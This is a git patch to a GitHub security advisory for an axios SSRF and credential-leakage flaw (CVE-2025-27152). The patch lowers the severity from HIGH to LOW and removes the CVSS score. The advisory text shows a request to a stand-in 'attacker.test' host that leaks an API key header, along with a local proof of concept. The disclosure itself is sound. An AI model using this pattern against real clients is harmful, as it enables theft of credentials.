From 590a73f9f6eb683ec9335862207765925f1fe8d3 Mon Sep 17 00:00:00 2001 From: vvalekk <129195766+vvalekk@users.noreply.github.com> Date: Mon, 31 Mar 2025 15:24:23 +0200 Subject: [PATCH] Improve GHSA-jr5f-v2jv-69x6 --- .../03/GHSA-jr5f-v2jv-69x6/GHSA-jr5f-v2jv-69x6.json | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/advisories/github-reviewed/2025/03/GHSA-jr5f-v2jv-69x6/GHSA-jr5f-v2jv-69x6.json b/advisories/github-reviewed/2025/03/GHSA-jr5f-v2jv-69x6/GHSA-jr5f-v2jv-69x6.json index 66d8b94de3a58..4f74f02bf3c7c 100644 --- a/advisories/github-reviewed/2025/03/GHSA-jr5f-v2jv-69x6/GHSA-jr5f-v2jv-69x6.json +++ b/advisories/github-reviewed/2025/03/GHSA-jr5f-v2jv-69x6/GHSA-jr5f-v2jv-69x6.json @@ -1,19 +1,14 @@ { "schema_version": "1.4.0", "id": "GHSA-jr5f-v2jv-69x6", - "modified": "2025-03-28T14:57:51Z", + "modified": "2025-03-28T14:57:53Z", "published": "2025-03-07T15:16:00Z", "aliases": [ "CVE-2025-27152" ], "summary": "axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL", "details": "### Summary\n\nA previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).\nReference: axios/axios#6463\n\nA similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠`baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.\n\n### Details\n\nConsider the following code snippet:\n\n```js\nimport axios from \"axios\";\n\nconst internalAPIClient = axios.create({\n baseURL: \"http://example.test/api/v1/users/\",\n headers: {\n \"X-API-KEY\": \"1234567890\",\n },\n});\n\n// const userId = \"123\";\nconst userId = \"http://attacker.test/\";\n\nawait internalAPIClient.get(userId); // SSRF\n```\n\nIn this example, the request is sent to `http://attacker.test/` instead of the `baseURL`. As a result, the domain owner of `attacker.test` would receive the `X-API-KEY` included in the request headers.\n\nIt is recommended that:\n\n-\tWhen `baseURL` is set, passing an absolute URL such as `http://attacker.test/` to `get()` should not ignore `baseURL`.\n-\tBefore sending the HTTP request (after combining the `baseURL` with the user-provided parameter), axios should verify that the resulting URL still begins with the expected `baseURL`.\n\n### PoC\n\nFollow the steps below to reproduce the issue:\n\n1.\tSet up two simple HTTP servers:\n\n```\nmkdir /tmp/server1 /tmp/server2\necho \"this is server1\" > /tmp/server1/index.html \necho \"this is server2\" > /tmp/server2/index.html\npython -m http.server -d /tmp/server1 10001 &\npython -m http.server -d /tmp/server2 10002 &\n```\n\n\n2.\tCreate a script (e.g., main.js):\n\n```js\nimport axios from \"axios\";\nconst client = axios.create({ baseURL: \"http://localhost:10001/\" });\nconst response = await client.get(\"http://localhost:10002/\");\nconsole.log(response.data);\n```\n\n3.\tRun the script:\n\n```\n$ node main.js\nthis is server2\n```\n\nEven though `baseURL` is set to `http://localhost:10001/`, axios sends the request to `http://localhost:10002/`.\n\n### Impact\n\n-\tCredential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.\n-\tSSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.\n-\tAffected Users: Software that uses `baseURL` and does not validate path parameters is affected by this issue.", - "severity": [ - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" - } - ], + "severity": [], "affected": [ { "package": { @@ -92,7 +87,7 @@ "cwe_ids": [ "CWE-918" ], - "severity": "HIGH", + "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2025-03-07T15:16:00Z", "nvd_published_at": "2025-03-07T16:15:38Z"